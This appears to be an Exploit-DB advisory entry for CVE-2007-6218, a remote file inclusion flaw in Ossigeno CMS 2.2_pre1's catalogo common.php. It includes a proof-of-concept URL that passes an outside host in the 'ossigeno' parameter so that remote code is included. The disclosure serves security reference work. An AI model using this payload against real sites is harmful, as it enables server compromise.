Ossigeno CMS 2.2_pre1 ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion

2007-11-30T00:00:00
ID EDB-ID:30831
Type exploitdb
Reporter ShAy6oOoN
Modified 2007-11-30T00:00:00

Description

Ossigeno CMS 2.2_pre1 ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion. CVE-2007-6218 . Webapps e...

                                        
                                            source: http://www.securityfocus.com/bid/26654/info
     
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
     
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
     
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
 
http://www.example.com/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://www.example2.com